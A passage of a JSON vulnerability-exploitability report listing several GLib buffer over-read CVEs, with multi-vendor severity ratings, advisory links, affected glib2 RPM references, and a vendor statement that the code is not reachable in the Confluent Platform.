          "url": "https://bugzilla.redhat.com/2492247"
        },
        {
          "url": "https://bugzilla.redhat.com/2492248"
        },
        {
          "url": "https://bugzilla.redhat.com/2492255"
        },
        {
          "url": "https://bugzilla.redhat.com/2492256"
        },
        {
          "url": "https://bugzilla.redhat.com/2499675"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492243"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492245"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492247"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492248"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492255"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492256"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2499675"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-15588"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58010"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58011"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58012"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58013"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58014"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58015"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-55440.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:55440"
        },
        {
          "url": "https://github.com/advisories/GHSA-m7rp-473c-296x"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/3915"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-58010.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-55440.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58010"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-58010"
        }
      ],
      "published": "2026-06-30T13:19:17+00:00",
      "updated": "2026-08-17T10:16:41+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.68.4-19.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-58011",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        125
      ],
      "description": "A flaw was found in GLib. An out-of-bounds read of only 2 bytes can occur in the g_date_time_get_ymd function in the glib/gdatetime.c file when an invalid GDateTime object produced by the g_date_time_add_full function is processed. This flaw can corrupt the date output and potentially cause logic errors that may lead to a denial of service.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-58011"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:49512"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:55440"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-58011"
        },
        {
          "url": "https://bugzilla.redhat.com/2492243"
        },
        {
          "url": "https://bugzilla.redhat.com/2492245"
        },
        {
          "url": "https://bugzilla.redhat.com/2492247"
        },
        {
          "url": "https://bugzilla.redhat.com/2492248"
        },
        {
          "url": "https://bugzilla.redhat.com/2492255"
        },
        {
          "url": "https://bugzilla.redhat.com/2492256"
        },
        {
          "url": "https://bugzilla.redhat.com/2499675"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492243"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492245"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492247"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492248"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492255"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492256"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2499675"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-15588"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58010"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58011"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58012"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58013"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58014"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58015"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-55440.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:55440"
        },
        {
          "url": "https://github.com/advisories/GHSA-8xmh-8wfg-9f6j"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/3917"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/work_items/3917"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-58011.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-55440.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58011"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-58011"
        }
      ],
      "published": "2026-06-30T13:19:17+00:00",
      "updated": "2026-08-17T10:16:41+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.68.4-19.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-58012",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 8.2,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 8.2,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        126
      ],
      "description": "A flaw was found in GLib. A buffer over-read can occur in the g_regex_replace function when used with the `G_REGEX_RAW` compile flag and case-change replacement escapes because the string_append function processes matched substrings using UTF-8 functions that assume valid UTF-8 input, even when the string is treated as raw bytes. This vulnerability can cause a minor information disclosure of 1-5 bytes and a denial of service when the buffer over-read crosses a page boundary.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-58012"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:49512"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:55440"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-58012"
        },
        {
          "url": "https://bugzilla.redhat.com/2492243"
        },
        {
          "url": "https://bugzilla.redhat.com/2492245"
        },
        {
          "url": "https://bugzilla.redhat.com/2492247"
        },
        {
          "url": "https://bugzilla.redhat.com/2492248"
        },
        {
          "url": "https://bugzilla.redhat.com/2492255"
        },
        {
          "url": "https://bugzilla.redhat.com/2492256"
        },
        {
          "url": "https://bugzilla.redhat.com/2499675"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492243"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492245"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492247"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492248"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492255"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492256"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2499675"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-15588"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58010"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58011"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58012"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58013"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58014"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58015"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-55440.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:55440"
        },
        {
          "url": "https://github.com/advisories/GHSA-vwg8-37h9-g38g"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/3918"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-58012.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-55440.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58012"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-58012"
        }
      ],
      "published": "2026-06-30T13:19:17+00:00",
      "updated": "2026-08-17T10:16:41+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.68.4-19.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-58013",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 8.2,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 8.2,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        126
      ],
      "description": "A flaw was found in GLib. A buffer over-read can occur in g_io_channel_read_line_backend() in the giochannel.c file when a custom line terminator with a length greater than one is set, causing memcmp to read past the GString buffer. This vulnerability can cause a minor information disclosure of 7 bytes or a denial of service when the buffer over-read crosses a page boundary.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-58013"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:49512"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:55440"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-58013"
        },
        {
          "url": "https://bugzilla.redhat.com/2492243"
        },
        {
          "url": "https://bugzilla.redhat.com/2492245"
        },
        {
          "url": "https://bugzilla.redhat.com/2492247"
        },
        {
          "url": "https://bugzilla.redhat.com/2492248"
        },
        {
          "url": "https://bugzilla.redhat.com/2492255"
        },
        {
          "url": "https://bugzilla.redhat.com/2492256"
        },
        {
          "url": "https://bugzilla.redhat.com/2499675"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492243"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492245"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492247"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492248"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492255"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492256"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2499675"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-15588"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58010"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58011"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58012"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58013"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58014"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58015"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-55440.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:55440"
        },
        {
          "url": "https://github.com/advisories/GHSA-4x46-h598-64qr"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/3925"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-58013.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-55440.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58013"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-58013"
        }
      ],
      "published": "2026-06-30T13:19:17+00:00",
      "updated": "2026-08-17T10:16:41+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.68.4-19.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-58014",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 8.6,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 8.6,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.3,
          "severity": "medium",
          "method": "CVSSv31",
